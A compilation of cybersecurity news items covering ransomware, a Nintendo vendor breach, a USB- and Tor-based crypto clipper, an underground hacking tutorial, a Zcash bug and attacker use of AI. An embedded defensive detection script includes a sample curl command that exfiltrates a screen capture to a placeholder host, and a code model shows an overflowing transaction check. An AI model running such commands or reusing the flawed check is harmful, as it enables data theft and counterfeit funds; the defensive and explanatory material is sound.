Ukraine Joins EU Cybersecurity Reserve to Strengthen Cyber Resilience and Emergency Response

 

Now able to tap into the EU’s emergency cyber network, Ukraine joins a support framework cleared by the Council of the European Union. When overwhelming cyberattacks strike, help may come faster because Kyiv can formally seek aid beyond what it handles alone. Specialized teams and resources from across the bloc stand ready, activated through shared crisis procedures. 

This link strengthens real-time defense options amid severe digital threats. Help arrives via the EU Cybersecurity Reserve, run by ENISA - the European Union’s cybersecurity agency. Born from the Cyber Solidarity Act, it lets member nations turn to vetted private experts if local teams cannot keep up. As attacks grow more complex, ties in tech defense strengthen between the bloc and Ukraine. Their collaboration now includes shared readiness against online risks. 

If a cyberattack overwhelms Ukraine’s internal resources, it can officially trigger emergency support through the framework. When that happens, digital security specialists from various European nations might step in to help control, examine, and recover systems. Officials view this measure as one piece of wider work aimed at boosting readiness, speeding up reactions, and building stronger collaboration amid rising complexity in online attacks. 

Though cyber threats grow more frequent, unity among nations strengthens defenses. Because attacks target government systems, companies, and vital services, joint efforts matter more now. The European Commission views this move as a step toward stronger cooperation. When one country acts alone, risks rise - yet shared knowledge reduces vulnerability. As digital dangers spread, responses must shift from isolated attempts to unified strategies. Now ranking as the second non-EU nation within the reserve, Ukraine follows Moldova’s inclusion during 2024. 

That year, rising cyber threats tied to Russian activity prompted Moldova’s entry. Seen by European authorities as pivotal for regional collaboration on digital security, its involvement highlights ongoing efforts. Resilience in cyberspace continues shaping how the EU engages nearby states. Progress here reflects broader aims, yet depends heavily on real-time readiness. Besides tackling cyber threats, the European Union now works more closely with Moldova on various digital fronts. 

Recently, an accord was reached politically, paving the way for Moldova’s entry into the EU Roaming Zone - pending official approval. Should it pass, people from both regions could make calls, send messages, or access data while traveling, free of extra fees. Now operating within the EU Third Countries’ Trusted List, Moldova streamlines how electronic signatures and digital seals are recognized across entities and individuals. 

Backed by EU funding, a fresh node of the European Digital Media Observatory - named FACT - emerges to counter disinformation and external manipulation efforts. The cyber defense news comes right after fresh progress in how the EU engages Ukraine and Moldova. Talks to join the bloc have officially started, recently backed unanimously by national leaders.

Marking the moment, Commission head Ursula von der Leyen called it a turning point - not just symbolic, but rooted in real changes made amid hardship. Her view: this step shows lasting support for peace, resilience, and shared effort where it matters most. 

Now more shielded, Ukraine taps into the EU Cybersecurity Reserve, linking efforts with European allies when large-scale digital threats emerge. This cooperation builds lasting strength in facing future attacks, not just immediate fixes. Through shared response channels, new stability takes root beyond borders. Long-term readiness grows quietly but steadily from such joint undertakings.

India Temporarily Bans Telegram Ahead of NEET UG 2026 Re-Exam to Curb Fraud

 

India has temporarily restricted Telegram ahead of the NEET UG 2026 re-examination, as authorities move to curb exam fraud and protect the integrity of one of the country’s most important medical entrance tests. The decision has drawn attention because Telegram is widely used for communication, study groups, and information sharing, making the restriction both significant and controversial. 

The action was taken after the National Testing Agency recommended stronger controls amid concerns that organized cheating groups were exploiting the app to circulate question papers and misleading claims. Officials said the temporary ban is intended to stop candidates from being targeted by fraud networks that can spread manipulated content quickly during a high-stakes exam period. 

Under the order, access to Telegram in India is restricted until June 22, 2026, covering the exam day and the immediate aftermath. Authorities also directed the company to disable its message-editing feature in India until June 30, 2026, saying that feature had allegedly been misused to make old posts look like proof of a paper leak. 

The measure has sparked debate because Telegram is used not only for illicit activity but also for legitimate education, work, and community communication. Telegram has reportedly challenged the decision in court, while the Delhi High Court upheld the government’s temporary block on June 19, citing emergency grounds and compliance with the law. 

The broader issue goes beyond one app: exam leaks and digital fraud are becoming harder to control as messaging platforms, edited content, and anonymous groups make false claims easier to spread. For students, the immediate focus is on the re-exam schedule, but for policymakers, the case is a reminder that future exam security may require faster monitoring, tighter platform cooperation, and clearer digital enforcement rules.

INC Ransomware Climbs Into Top Tier of Cybercrime Operations, Surpasses 830 Victims

 



The ransomware operation known as INC has grown into one of the most active cybercrime groups of 2026, with security researchers linking it to more than 830 victims since it first appeared in August 2023.

According to researchers at Acronis, the group's rise coincided with disruptions affecting major ransomware brands such as LockBit and BlackCat. As affiliates sought alternative platforms, INC appears to have benefited from that shift. More than 65% of the victims listed by the group are based in the United States, with legal firms, healthcare providers, manufacturers, construction companies, and technology organizations among the most frequently targeted sectors.

Researchers also observed major changes to the ransomware itself. INC's malware for Windows and Linux/VMware ESXi systems has been rewritten in Rust, a programming language increasingly adopted by malware developers because it supports multiple operating systems and can complicate reverse-engineering efforts.

The group's toolkit has expanded as well. Recent attacks have involved a credential-stealing utility capable of extracting authentication data from newer Veeam backup deployments that use salted DPAPI encryption. Access to backup infrastructure can give attackers valuable credentials while also making recovery efforts more difficult for victims.

Acronis noted that the sale of INC's Windows and Linux ransomware variants on underground cybercrime forums in May 2024 contributed to the appearance of related ransomware families, including Lynx and Sinobi. Researchers identified significant code similarities between the groups.

Investigators found that INC affiliates rely on several entry points to compromise networks, including spear-phishing campaigns, credentials purchased from Initial Access Brokers (IABs), and the exploitation of publicly exposed systems running vulnerable versions of Citrix NetScaler, Fortinet EMS, and SimpleHelp software.

Once inside a network, attackers harvest credentials, move between systems using legitimate administrative tools such as RDP and PsExec, and attempt to weaken security controls through a technique known as Bring Your Own Vulnerable Driver (BYOVD). Researchers observed the use of vulnerable drivers including filwfp.sys, filnk.sys, and fildds.sys. The group also deploys tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer to maintain access and control compromised environments.

Before encryption begins, stolen files are collected and transferred using Rclone, often after being packaged into password-protected archives. The ransomware then encrypts systems using multithreading and partial-encryption techniques to speed up the process. When launched against VMware ESXi environments, the malware can also attempt to shut down virtual machines.

Data from ZeroFox ranked INC as the fourth most active ransomware operation during the first quarter of 2026, recording more than 120 incidents. Researchers said the group's growth demonstrates how ransomware operators can build large-scale campaigns using widely available tools, stolen credentials, and unpatched systems rather than relying on highly specialized malware.

Nintendo Confirms Third-Party Survey Data Breach, Says Customer Information Remains Secure

 


Nintendo of America has acknowledged that employee survey data was exposed through a security incident involving TinyPulse, a third-party platform used for internal feedback and engagement surveys. The company emphasized that its own systems were not compromised and that no customer or financial information was affected.

The confirmation follows claims made by the Shadowbyt3$ cybercrime group, which alleged that it had obtained sensitive information linked to Nintendo of America employees.

“We are aware of an issue involving TinyPulse, a third-party service used for internal employee surveys at Nintendo of America,” stated Nintendo.

“Nintendo’s systems have not been compromised, and no personal customer or financial data has been accessed.”

“The data involved is limited to internal survey content comprising a small subset of our employees, and most of the information dates back several years,” the company told BleepingComputer.

Nintendo of America, which oversees operations across the United States, Canada, and parts of Latin America, explained that the affected information was restricted to internal survey content collected through TinyPulse.

TinyPulse is a workplace engagement platform that enables organizations to conduct anonymous employee surveys, gather feedback, analyze workforce sentiment, and assess company culture.

Nintendo added that it is “working with the service provider to address the issue.”

Meanwhile, BleepingComputer reached out to WebMD Health Services, the owner of TinyPulse, seeking additional details about the incident and its potential impact. However, no response had been received at the time of publication.

Despite Nintendo’s statement that only survey-related information was exposed, the Shadowbyt3$ group claims the stolen data includes more extensive employee records.

The threat actor initially alleged that nearly 1GB of data had been taken from Nintendo and gave the company 48 hours to begin negotiations before the information would be released publicly.

According to the group, the dataset contains employee names, email addresses, survey and analytics information, bank statements, W-9 forms, employee identification details, progress plans, and reports spanning from 2016 to 2026.

"If you contact us we give you an extra day to think this through. We are demanding a ransom payment of 2 million dollars," reads the Shadowbyt3$ post.

In a follow-up statement, the group claimed that the incident did not impact Nintendo’s gaming operations and instead affected “a small amount of employees that work for nintendo and have used tinypulse.”

The attackers later published another message suggesting additional organizations could be targeted and shared a link to what they claimed was leaked employee communications. The post implied that Nintendo declined to meet the ransom demand.

BleepingComputer stated that it did not download or verify the authenticity of the allegedly leaked files. Regardless of the claims, Nintendo has maintained that customer information was not involved in the incident and that users do not need to take any action.

Shadowbyt3$ is a relatively new cybercriminal operation that describes itself as an “extortion as a service” group and claims to have been active since October 2025. The group says it publishes stolen information from organizations that refuse to pay ransom demands and promises that data “will be Deleted Permanently and you will not hear from us again” if a payment agreement is reached.

Cybersecurity experts and law enforcement agencies continue to advise organizations against paying ransom demands, noting that doing so can encourage future attacks. They also warn that there is no assurance stolen information will not be retained or sold even after a payment is made.

Microsoft Exposes Malware Operation Combining USB LNK Worms and Tor-Based C2 Servers

 


Combining cryptocurrency theft, covert communications, and remote access into a single malware framework gives a threat actor greater stealth and persistence. Microsoft has revealed the existence of a Windows-based clipper campaign active since February 2026. The campaign uses a portable Tor client, Windows Script Host, and ActiveX components to communicate with a hidden command-and-control server.

Besides intercepting and replacing cryptocurrency wallet addresses, the malware also performs continuous clipboard monitoring, captures screenshots, exfiltrates stolen data, and executes remote commands. 

A key characteristic of the operation is that it uses neither traditional installer mechanisms nor publicly exposed C2 servers. Instead, it relies on Tor-routed traffic to conceal its activity, and it extends beyond financial theft to lightweight backdoor functions.

USB-Borne Infection Chain Drives Initial Compromise

Further investigation revealed that the operation is characterized by a multi-stage infection chain combining removable media propagation with credential and asset theft.

According to Microsoft, the campaign originated through malicious Windows shortcut (.LNK) files distributed on USB storage devices, enabling the malware to spread without relying on online delivery mechanisms. Once executed, the infection deploys two components: a worm that propagates to additional removable drives, and a clipper module designed to obtain cryptocurrency seed phrases, private keys, and wallet information.

Obfuscation and Persistence Mechanisms Enhance Stealth

As part of its propagation mechanism, the worm exploits users' trust in familiar file formats. When it scans USB devices for commonly accessed document formats like Microsoft Word, Excel, and PDF, it conceals the original filenames and replaces them with identically named malicious shortcuts.

In addition to increasing user interaction, this strategy masks the infection process: upon execution, additional payloads are unpacked into randomly generated directories within the Public Documents path, and persistence is then established through scheduled tasks. To minimize the possibility of detection, the malware attempts to modify local defenses by creating antivirus exclusions for its staging locations and executable components.

According to Microsoft, extensive efforts have been made to obstruct the process of forensic analysis, such as packaging the installer with PyInstaller and obfuscation with PyArmor, and using JavaScript-based modules with layered encryption as well as runtime decryption. This malware performs an anti-analysis check by searching for Windows Task Manager processes and terminating execution if monitoring is detected, underscoring the operator's emphasis on long-term stealth and evasion. 

Tor-Based Communications Power Clipboard Hijacking Operations

After clearing the anti-analysis checks and activating the stealer module, the malware enters a highly automated surveillance phase designed to detect and intercept cryptocurrency-related activity in near real-time. Microsoft observed that the component uses a Tor executable named ugate.exe to communicate with its hidden command-and-control infrastructure, so that all traffic is routed through anonymized channels.

Once installed, the malware checks the system clipboard every 500 milliseconds for a specific set of highly valuable cryptocurrency artifacts. These include 12-word and 24-word recovery phrases for Bitcoin, Ethereum private keys, Bitcoin wallet import format (WIF) keys, and wallet addresses for Tron and Monero as well as Bitcoin legacy, P2SH, Bech32, and Taproot formats.

Upon detecting a matching entry, the malware silently replaces it with the address of an attacker's wallet. Substituted addresses are carefully selected to share similar leading characters or numeric patterns with the original destination, which reduces the likelihood of detection during visual verification. The final stage of the infection emphasizes operational concealment and attacker control.

By launching a renamed Tor executable in the background, the malware is able to identify the compromised host and register it with an external infrastructure without exposing direct network communications to the outside world. 

Upon enrollment, the infected system begins a continuous operational cycle, polling the command-and-control environment for instructions while simultaneously inspecting the clipboard contents at approximately half-second intervals to identify cryptocurrency seed phrases, private keys, and wallets. 

Also, command responses containing the EVAL directive enable the operators to execute attacker-supplied code in real-time, allowing them to expand functionality or take subsequent actions after a compromise. 

The mixture of scripting abuse, removable media propagation, and Tor-based communications underlies Microsoft's recommendation that behavioral detection strategies be prioritized. These strategies include monitoring PowerShell-driven screen capture activity, suspicious use of WScript and CScript, and script-engine processes spawning unexpected executables, including curl, cmd.exe, and PowerShell.

Further recommendations include disabling AutoRun and AutoPlay for removable media, using Group Policy controls to restrict the execution of LNK files from USB devices, limiting unnecessary access to scripting engines, and closely monitoring clipboard access and screen capture behavior on systems involved in cryptocurrency or other sensitive financial transactions.

Remote Code Execution Expands Malware Capabilities

Researchers discovered that the campaign's data collection capabilities go beyond clipboard manipulation. Screenshots were captured and transferred to the command-and-control server through the native curl utility, providing operators with continuous insight into victims' activity.

Furthermore, the malware integrates remote code execution functionality, extending the framework's operational scope beyond a conventional cryptocurrency clipper. Using the EVAL command, operators can instruct the malware to retrieve additional JavaScript payloads, save them locally as cfile files, and execute them directly on the compromised host.

Essentially, this capability turns the infection into an on-demand access platform capable of deploying new functionality after the initial compromise. Because the malware is highly obfuscated and continuously evolving, Microsoft noted that behavioral indicators offer a more reliable detection opportunity than static signatures. Security teams should monitor for suspicious activity associated with wscript.exe and cscript.exe, unexpected executions of curl, PowerShell, and cmd.exe, and anomalous child process chains.

Additionally, connections directed to localhost:9050 and other signs of Tor proxy usage may provide valuable indications that a host has been compromised by this campaign. The campaign Microsoft describes illustrates how traditional malware techniques can be combined with anonymous infrastructure and scripting-based execution to create threats that are not only difficult to detect but also highly adaptable as cybercriminal operations continue to evolve.

In environments characterized by removable media and digital asset transactions, the findings underscore the importance of monitoring behavioral indicators in conjunction with conventional security controls. To identify attacks that prioritize stealth over scale, defenders must maintain visibility into unusual script activity, Tor-related communications, and clipboard manipulation.
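The behavioral indicators described above (script engines spawning curl, cmd.exe or PowerShell, PowerShell-driven screen capture, and connections to localhost:9050) can be combined into per-host triage logic. The sketch below is an added example, not code from Microsoft or the original article; the event field names (loosely modeled on Sysmon process-creation and network-connection records), the `CopyFromScreen` keyword heuristic, the severity scheme and all sample events are assumptions constructed for illustration.

```python
"""Per-host triage of the behavioral indicators named in the article (added example)."""
from collections import defaultdict
from ntpath import basename  # parses Windows paths correctly on any OS

SCRIPT_ENGINES = {"wscript.exe", "cscript.exe"}
SUSPECT_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
TOR_SOCKS_PORT = 9050
TOR_HIT = "loopback_tor_socks_connection"

# Constructed sample events. event_id 1 = process creation, 3 = network
# connection. Field names and all values are assumptions for this example.
SAMPLE_EVENTS = [
    {"host": "WS-01", "event_id": 1,
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'wscript.exe "C:\Users\Public\Documents\sample\run.js"'},
    {"host": "WS-01", "event_id": 1,
     "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "curl.exe -F file=@capture.png http://example.invalid/upload"},
    {"host": "WS-01", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": 'powershell.exe -Command "... CopyFromScreen ..."'},
    {"host": "WS-01", "event_id": 3,
     "image": r"C:\Windows\System32\curl.exe",
     "dest_ip": "127.0.0.1", "dest_port": 9050},
    # Legacy admin logon script: a script engine spawning cmd.exe, no Tor signal.
    {"host": "WS-02", "event_id": 1,
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\cscript.exe",
     "command_line": "cmd.exe /c net use"},
    # Ordinary interactive use: nothing should fire.
    {"host": "WS-03", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-ChildItem"},
    {"host": "WS-03", "event_id": 3,
     "image": r"C:\Program Files\App\app.exe",
     "dest_ip": "127.0.0.1", "dest_port": 8080},
]


def _name(path):
    """Lower-cased executable name from a Windows path (empty if missing)."""
    return basename(path or "").lower()


def classify(event):
    """Return the indicator names matched by a single event."""
    hits = []
    if event["event_id"] == 1:
        child = _name(event.get("image"))
        parent = _name(event.get("parent_image"))
        # Script-engine process spawning curl, cmd.exe or PowerShell.
        if parent in SCRIPT_ENGINES and child in SUSPECT_CHILDREN:
            hits.append("script_engine_spawned_" + child)
        # Keyword heuristic for PowerShell-driven screen capture (assumption).
        cmd = event.get("command_line", "").lower()
        if child == "powershell.exe" and "copyfromscreen" in cmd:
            hits.append("powershell_screen_capture")
    elif event["event_id"] == 3:
        # Any process talking to a local SOCKS listener on the Tor default port.
        if event.get("dest_ip") in LOOPBACK and event.get("dest_port") == TOR_SOCKS_PORT:
            hits.append(TOR_HIT)
    return hits


def triage(events):
    """Group indicators per host; a host showing both a process-chain signal
    and the Tor proxy signal is ranked 'high', a single signal type 'medium'."""
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]].update(classify(event))
    report = {}
    for host, hits in per_host.items():
        if not hits:
            continue
        has_tor = TOR_HIT in hits
        has_proc = any(h != TOR_HIT for h in hits)
        report[host] = {
            "severity": "high" if has_tor and has_proc else "medium",
            "indicators": sorted(hits),
        }
    return report


if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, result["severity"], ", ".join(result["indicators"]))
```

Correlating the two signal types per host keeps a lone logon script or a lone local proxy at medium priority while surfacing the combination the article describes.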

Underground Forum Tutorial Reveals How Cybercriminal Communities Teach Vulnerability Exploitation and Profit-Making

 

A forum discussion titled “Hacking for Profit. Working method” has provided cybersecurity researchers with a unique look into how underground communities educate aspiring hackers on vulnerability exploitation and monetization. While the original post is neither highly technical nor extensive, its significance lies in presenting a structured, easy-to-follow roadmap that simplifies a complex process.

The post, authored by a threat actor operating under the alias "Hercules," outlines the stages of identifying, assessing, exploiting, and ultimately profiting from vulnerabilities. Researchers from Flare examined both the original content and the subsequent discussions over several months, finding that the thread sparked considerable engagement among forum members.

The discussion attracted numerous responses from users who expressed appreciation for the guidance, sought private communication with "Hercules," and identified themselves as beginners hoping to transition from theoretical cybersecurity knowledge to practical application. According to researchers, the thread appeared to serve as more than just an instructional post, functioning as a source of motivation and mentorship for inexperienced individuals.

The popularity of the tutorial extended beyond its original platform, with the same methodology being reposted and debated across four additional underground forums. Through the post, "Hercules" presents a straightforward framework that helps novice threat actors understand vulnerability exploitation and methods of generating revenue from discovered flaws.

The guide begins by advising readers on how to monitor newly disclosed vulnerabilities, particularly high-impact categories such as remote code execution (RCE), authentication bypass, account takeover, insecure direct object references (IDOR), and data exposure vulnerabilities. It then explains how to locate potentially vulnerable systems, verify exposure, and determine whether findings should be reported, sold, or exploited.

Researchers identified three particularly notable aspects of the tutorial. First, it highlights the use of the Nuclei framework developed by ProjectDiscovery, a widely adopted tool among offensive security professionals. Second, it demonstrates an understanding of the difficulties organizations face when patching newly disclosed vulnerabilities. Third, the tutorial is deliberately separated into “legal” and “illegal” paths, allowing readers to choose at which stage they transition from vulnerability disclosure activities into malicious actions.

One of the tutorial’s most effective features is its approachable tone. Rather than relying on technical jargon, "Hercules" explains concepts in simple language and portrays hacking as a skill that can be learned through practical experience.

He argues that many educational resources focus excessively on subjects such as operating systems, programming languages, scanner configurations, and computer science fundamentals, while many newcomers simply want to "hack," "break in," and "gain access."

The author further suggests that aspiring hackers do not need advanced software development expertise to get started. Publicly available tools, community-created templates, automation, and artificial intelligence are presented as resources that lower the entry barrier, while programming knowledge is described as beneficial but not essential.

This message resonated strongly with forum members. One participant noted that despite completing numerous hacking courses, they struggled to apply their knowledge in real-world scenarios. Another admitted having no programming experience and questioned whether that would prevent them from succeeding.

Many respondents praised the post for its clarity and organization, while others requested direct mentorship or private communication with "Hercules."

A key element of the tutorial is its focus on turning vulnerability discoveries into financial opportunities. According to "Hercules," individuals who uncover vulnerabilities have several options available.

One approach involves contacting the owner of the affected website, server, or hosting provider and offering vulnerability details in exchange for compensation. As the author explains, some organizations are willing to reward responsible disclosure efforts, adding that “…you can take your money home and be proud of yourself”.

The tutorial also discusses selling discovered vulnerabilities through underground marketplaces. In some cases, "Hercules" suggests that actors may simultaneously approach the victim while marketing the same information elsewhere.

Additionally, the guide encourages exploiting vulnerabilities to determine what assets or information reside on compromised systems. Remote code execution vulnerabilities are described as opportunities that can be sold to botnet operators, abused for unauthorized resource usage, or leveraged for data theft. Similarly, account takeover, IDOR, and data leakage vulnerabilities are portrayed as valuable commodities that can be quickly monetized.

"Hercules" characterizes himself as a hacker rather than a fraudster, claiming a preference for rapid sales of access or information rather than engaging in subsequent fraudulent activities.

The forum responses indicate that the thread's influence stemmed from the confidence and practical direction it provided rather than from groundbreaking technical information.

Many users requested additional mentorship, private conversations, and more detailed follow-up material. Others expressed frustration with the limitations of theoretical learning and viewed the tutorial as a useful bridge toward hands-on experience.

Researchers noted that unlike highly technical exploit analyses, which typically appeal to a specialized audience, simple and motivational workflows can attract a much broader group of aspiring participants. Because the methodology is not tied to any specific vulnerability, its relevance can persist for extended periods.

The tutorial promotes a repeatable process: monitor newly disclosed vulnerabilities, identify exposed systems, validate findings, monetize opportunities, and repeat the cycle. This mindset, researchers suggest, provides insight into how inexperienced actors are introduced to cybercrime and encouraged to prioritize certain categories of vulnerabilities.

The post also appears to function as an informal recruitment channel, as "Hercules" repeatedly encourages users to initiate private conversations.

The tutorial highlights several important considerations for organizations responsible for cybersecurity.

First, critical vulnerabilities that are easily reachable remain prime targets for attackers. While automated botnets often begin scanning for exploitable systems shortly after vulnerabilities and proof-of-concept exploits become public, the tutorial demonstrates that even novice threat actors are being encouraged to pursue these opportunities.

Second, older vulnerabilities continue to pose significant risks. Legacy systems running outdated versions of platforms such as Drupal or WordPress may remain attractive targets for less experienced attackers seeking accessible entry points.

Third, researchers emphasize the importance of maintaining effective vulnerability disclosure programs. Financial incentives can encourage security researchers to report vulnerabilities responsibly rather than seeking alternative methods of monetization. Even if information eventually reaches underground markets, early disclosure provides organizations with an opportunity to mitigate risk before widespread exploitation.

Researchers argue that the significance of the thread lies not in the introduction of a new exploitation technique but in its ability to simplify cybercrime into a repeatable business process.

By transforming a technically complex subject into an understandable workflow, "Hercules" makes vulnerability exploitation appear achievable to newcomers. The enthusiastic responses from inexperienced users suggest that this approach is effective.

The findings underscore a broader trend within the cybercrime ecosystem: malicious capabilities do not grow solely through advanced malware development or zero-day discoveries. They also expand through accessible tutorials, mentorship, publicly available tools, and online communities that lower barriers to entry and make illicit activity appear attainable.

New Apple Ad Blocker Filtr Expands Protection Beyond Browsers on iPhone, iPad and Mac

 

Filtr, a fresh ad-blocking app, extends privacy for Apple device owners. Instead of limiting itself to web browsers, it stops advertisements inside mobile and desktop applications too. Created by Kaylee Serena Calderolla - known for developing Wipr, a tool that blocks ads in Safari - it taps into features unveiled in iOS 26 and macOS 26. Through these updates, the software intercepts ad-related data directly within the system’s network layer. Beyond the usual add-ons confined to Safari alone, Filtr taps into Apple’s updated method for handling web traffic. 

With that foundation, it intercepts connections aimed at known ad networks long before content appears - stopping trackers and pop-ups not just in browsers but throughout compatible apps. Blocking happens earlier, silently, cutting down unwanted surveillance along with cluttered visuals wherever digital activity occurs. Filtr comes as a premium feature inside Wipr, an often-used tool that stops ads in Safari. 

Its creator, Calderolla, claims it runs without gathering any personal details or needing entry to sensitive user content. Updates to a custom blocklist - kept current by the maker - allow the filter system to work effectively. Working begins with an initial screening done locally on the device. This step uses a built-in catalog of sites that often serve ads. When uncertainty remains, a follow-up check occurs using a fuller database kept by Calderolla. Communication moves through Apple’s infrastructure, which keeps individual users anonymous to service creators. 

Only matching results trigger deeper analysis, limiting exposure of personal activity. Some people trying the function notice fewer commercials when opening certain programs, though a few show blank spaces instead of promotions. Enabling the link blocker just one time lets the software manage changes on its own, making preparation straightforward. Not every application behaves the same way - some skip ads entirely, others leave gaps. Updates happen in the background after initial activation, reducing ongoing effort. Filtr cannot stop all ads - some slip through when they come straight from an app’s built-in servers. 

Since cutting those might break how the app works, certain promotions stay visible. So, while using platforms like Facebook, Google, or Reddit, users may still spot occasional banners. Even with its constraints, progress shows clearly in how Wipr tackles ads across Apple devices. Priced at five dollars, it works on any device, whereas Filtr adds yearly fees unless users opt to pay twenty-five upfront inside the app.

Peter Todd Warns Zcash Privacy Tech Is Too Risky for Bitcoin Consensus Layer

 

Bitcoin developer Peter Todd has warned that Zcash-style privacy technology is too risky to integrate into Bitcoin’s consensus layer, arguing that the cryptographic complexity behind Zcash’s shielded transactions introduces unacceptable operational risk for Bitcoin’s base protocol. His comments came after the Zcash Open Development Lab disclosed a critical issue in Zcash’s Orchard shielded pool on June 1, 2026, which temporarily paralyzed the network and required an emergency hard fork to fix. 

The vulnerability affected Orchard, Zcash’s most widely used shielded pool for private transactions, and was discovered during routine security auditing on May 29 by researcher Taylor Hornby using an AI-assisted tool. The flaw centered on just two lines of code in the Orchard circuit, the cryptographic core that processes Zcash’s private transactions, and dated back to when Orchard launched in May 2022. CoinDesk reported that the issue could theoretically have allowed an attacker to mint counterfeit ZEC without leaving any on-chain evidence, though the bug was identified before any known exploitation occurred. 

Fixing it demanded a coordinated hard fork that forced nodes, wallets, and block explorers to update simultaneously, with Orchard transactions suspended during the upgrade window until re-enabled around 23:00 EDT on June 1. Nodes that failed to upgrade quickly became desynchronized, leaving the network paralyzed for several hours and exposing a major coordination problem unique to complex privacy protocols. Todd’s argument centers on the difference between visible and hidden failures in blockchain systems. In Bitcoin’s transparent accounting model, counterfeit coins or invalid outputs are immediately visible on-chain, making it relatively straightforward to detect bugs, identify affected coins, and reverse the chain if necessary. 

He cited Bitcoin’s 2010 value overflow incident and 2013 chain split as examples where rollback was feasible because only a small fraction of coins were affected and the exploit was trivial to notice. In Zcash’s shielded system, however, privacy cryptography using Halo 2 zk-SNARKs allows transaction validation without revealing sender, recipient, or amount, creating a dangerous blind spot where a bug could destroy shielded funds without developers being able to quantify the damage in real time. 

Todd emphasized that approximately 30% of Zcash’s total supply is already shielded in the Orchard pool, meaning a catastrophic failure would wipe out holdings for a high percentage of all Zcash users. He rejected comparisons to Bitcoin’s historical bugs, stating that neither the 2010 overflow nor CVE-2018-17144 could destroy the currency because counterfeit coins were trivially visible and easily rolled back. 
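The visible-failure argument can be made concrete with a small model, added here as an illustration and not taken from Bitcoin's code or from Todd's comments. It shows a simplified output check whose 64-bit sum wraps, a range-checked version, and the supply audit that any observer can run when amounts are public; all amounts and output names are constructed sample data, and the function names are this example's own.

```python
"""Added illustration (not Bitcoin's code): a 64-bit sum that wraps, and the
public supply audit that exposes the result on a transparent ledger."""

COIN = 100_000_000                 # smallest units per coin
MAX_MONEY = 21_000_000 * COIN      # Bitcoin's supply cap in smallest units
INT64_MAX = 2**63 - 1


def wrap_int64(n: int) -> int:
    """Reduce n to a signed 64-bit value, mimicking fixed-width arithmetic."""
    n &= (1 << 64) - 1
    return n - (1 << 64) if n > INT64_MAX else n


def accepts_naive(input_total: int, outputs: list[int]) -> bool:
    """Simplified flawed rule: outputs are non-negative and their 64-bit sum
    does not exceed the inputs. The sum itself is allowed to wrap."""
    total = 0
    for value in outputs:
        if value < 0:
            return False
        total = wrap_int64(total + value)
    return total <= input_total


def accepts_ranged(input_total: int, outputs: list[int]) -> bool:
    """Hardened rule: every value and every running total must stay inside
    [0, MAX_MONEY], so the sum can never reach the wrap-around point."""
    total = 0
    for value in outputs:
        if not 0 <= value <= MAX_MONEY:
            return False
        total += value
        if total > MAX_MONEY:
            return False
    return total <= input_total


def audit_supply(utxos: dict[str, int], expected_issued: int) -> dict:
    """Audit open to any observer when amounts are public: total the unspent
    outputs, compare with scheduled issuance, and name the outliers."""
    actual = sum(utxos.values())
    suspects = sorted(k for k, v in utxos.items() if not 0 <= v <= MAX_MONEY)
    return {
        "actual": actual,
        "expected": expected_issued,
        "excess": max(0, actual - expected_issued),
        "suspect_outputs": suspects,
    }


# Constructed sample data in the shape of an overflow incident (not chain data).
BAD_OUTPUTS = [2**63 - 500_000, 2**63 - 500_000]   # sum wraps to -1,000,000
BAD_INPUT_TOTAL = COIN // 2                        # half a coin is spent
EXPECTED_ISSUED = 100 * 50 * COIN                  # 100 blocks at 50 coins each
HONEST_UTXOS = {f"blk{i}:0": 50 * COIN for i in range(99)}
HONEST_UTXOS["blk99:0"] = 50 * COIN - BAD_INPUT_TOTAL  # remainder after the spend


def ledger_after_bad_tx() -> dict[str, int]:
    """Unspent outputs once the overflowing transaction has been accepted."""
    utxos = dict(HONEST_UTXOS)
    utxos["badtx:0"], utxos["badtx:1"] = BAD_OUTPUTS
    return utxos


if __name__ == "__main__":
    print("naive rule accepts :", accepts_naive(BAD_INPUT_TOTAL, BAD_OUTPUTS))
    print("ranged rule accepts:", accepts_ranged(BAD_INPUT_TOTAL, BAD_OUTPUTS))
    report = audit_supply(ledger_after_bad_tx(), EXPECTED_ISSUED)
    print("excess supply      :", report["excess"])
    print("suspect outputs    :", report["suspect_outputs"])
```

The audit works only because every output amount is readable; where amounts are hidden, as in the shielded transactions the article describes, an observer has no per-output values to total or flag.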

He argued that different types of cryptography have different levels of risk, and that Zcash-style cryptography carries a very high risk level reflected in Zcash having experienced much more serious issues than Bitcoin. The debate reflects a fundamental divide in crypto between innovation and protocol conservatism, with Todd favoring maintaining Bitcoin’s deliberately simple core design. 

Privacy advocates seeking Bitcoin improvements without consensus-layer changes point to Silent Payments, an application-layer solution that generates unique addresses for each transaction without exposing payment history. Unlike Zcash’s approach, Silent Payments does not modify Bitcoin’s base protocol, though adoption remains limited to wallets like Sparrow Wallet and Cake Wallet. At press time after the incident, ZEC traded around $532 following a 37.8% slide before recovering, demonstrating market volatility tied to Orchard’s technical stability.

Researchers Warn AI Is Blurring the Line Between Skilled and Unskilled Hackers

 




For years, cybersecurity teams have relied on established methods to determine how dangerous a threat actor might be. Analysts typically examine the techniques an attacker uses, the tools involved, and the complexity of an operation to estimate the level of risk. New research from Anthropic, however, suggests that artificial intelligence is beginning to disrupt those assumptions.

The company's Frontier Red Team recently analyzed 832 user accounts that were removed from Anthropic's platforms for engaging in malicious cyber activity between March 2025 and March 2026. Researchers compared the observed behavior against the MITRE ATT&CK framework, a widely used industry resource that categorizes adversary tactics and techniques. Portions of the findings were also referenced in Verizon's 2026 Data Breach Investigations Report.

The findings are a signal to keep up with how cybercriminals are using AI. Rather than limiting AI to basic tasks, attackers are increasingly applying it to activities that take place after gaining access to a target environment. This trend suggests that AI is becoming part of deeper operational stages of cyber intrusions, including tasks that traditionally required stronger technical expertise.

